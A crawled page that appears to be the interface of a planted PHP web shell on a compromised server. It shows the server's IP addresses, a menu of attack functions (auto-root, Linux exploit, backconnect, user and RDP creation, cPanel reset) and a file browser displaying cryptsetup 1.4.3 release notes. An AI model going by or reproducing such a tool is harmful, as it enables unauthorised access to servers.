Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.144.248.150
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
cryptsetup-2.0.3 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
102
B
-rw-r--r--
FAQ
118.35
KB
-rw-r--r--
v1.0.7-ReleaseNotes
2.85
KB
-rw-r--r--
v1.1.0-ReleaseNotes
4.92
KB
-rw-r--r--
v1.1.1-ReleaseNotes
1.75
KB
-rw-r--r--
v1.1.2-ReleaseNotes
1.56
KB
-rw-r--r--
v1.1.3-ReleaseNotes
482
B
-rw-r--r--
v1.2.0-ReleaseNotes
4.74
KB
-rw-r--r--
v1.3.0-ReleaseNotes
4.64
KB
-rw-r--r--
v1.3.1-ReleaseNotes
421
B
-rw-r--r--
v1.4.0-ReleaseNotes
5.19
KB
-rw-r--r--
v1.4.1-ReleaseNotes
889
B
-rw-r--r--
v1.4.2-ReleaseNotes
1.59
KB
-rw-r--r--
v1.4.3-ReleaseNotes
2.3
KB
-rw-r--r--
v1.5.0-ReleaseNotes
8.41
KB
-rw-r--r--
v1.5.1-ReleaseNotes
1.26
KB
-rw-r--r--
v1.6.0-ReleaseNotes
9.31
KB
-rw-r--r--
v1.6.1-ReleaseNotes
1.02
KB
-rw-r--r--
v1.6.2-ReleaseNotes
985
B
-rw-r--r--
v1.6.3-ReleaseNotes
1.82
KB
-rw-r--r--
v1.6.4-ReleaseNotes
1.99
KB
-rw-r--r--
v1.6.5-ReleaseNotes
2.42
KB
-rw-r--r--
v1.6.6-ReleaseNotes
1.07
KB
-rw-r--r--
v1.6.7-ReleaseNotes
3.25
KB
-rw-r--r--
v1.6.8-ReleaseNotes
2.01
KB
-rw-r--r--
v1.7.0-ReleaseNotes
3.03
KB
-rw-r--r--
v1.7.1-ReleaseNotes
1.34
KB
-rw-r--r--
v1.7.2-ReleaseNotes
1.45
KB
-rw-r--r--
v1.7.3-ReleaseNotes
811
B
-rw-r--r--
v1.7.4-ReleaseNotes
657
B
-rw-r--r--
v1.7.5-ReleaseNotes
833
B
-rw-r--r--
v2.0.0-ReleaseNotes
26
KB
-rw-r--r--
v2.0.1-ReleaseNotes
4.75
KB
-rw-r--r--
v2.0.2-ReleaseNotes
4.07
KB
-rw-r--r--
v2.0.3-ReleaseNotes
5.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : v1.4.3-ReleaseNotes
Cryptsetup 1.4.3 Release Notes ============================== Changes since version 1.4.2 * Fix readonly activation if underlying device is readonly (1.4.0). * Fix loop mapping on readonly file. * Include stddef.h in libdevmapper.h (size_t definition). * Fix keyslot removal for device with 4k hw block (1.4.0). (Wipe keyslot failed in this case.) * Relax --shared flag to allow mapping even for overlapping segments. The --shared flag (and API CRYPT_ACTIVATE_SHARED flag) is now able to map arbitrary overlapping area. From API it is even usable for LUKS devices. It is user responsibility to not cause data corruption though. This allows e.g. scubed to work again and also allows some tricky extensions later. * Allow empty cipher (cipher_null) for testing. You can now use "null" (or directly cipher_null-ecb) in cryptsetup. This means no encryption, useful for performance tests (measure dm-crypt layer overhead). * Switch on retry on device remove for libdevmapper. Device-mapper now retry removal if device is busy. * Allow "private" activation (skip some udev global rules) flag. Cryptsetup library API now allows to specify CRYPT_ACTIVATE_PRIVATE, which means that some udev rules are not processed. (Used for temporary devices, like internal keyslot mappings where it is not desirable to run any device scans.) * This release also includes some Red Hat/Fedora specific extensions related to FIPS140-2 compliance. In fact, all these patches are more formal changes and are just subset of building blocks for FIPS certification. See FAQ for more details about FIPS. FIPS extensions are enabled by using --enable-fips configure switch. In FIPS mode (kernel booted with fips=1 and gcrypt in FIPS mode) - it provides library and binary integrity verification using libfipscheck (requires pre-generated checksums) - it uses FIPS approved RNG for encryption key and salt generation (note that using /dev/random is not formally FIPS compliant RNG). - only gcrypt crypto backend is currently supported in FIPS mode. The FIPS RNG requirement for salt comes from NIST SP 800-132 recommendation. (Recommendation for Password-Based Key Derivation. Part 1: Storage Applications. http://csrc.nist.gov/publications/nistpubs/800-132/nist-sp800-132.pdf) LUKS should be aligned to this recommendation otherwise.
Close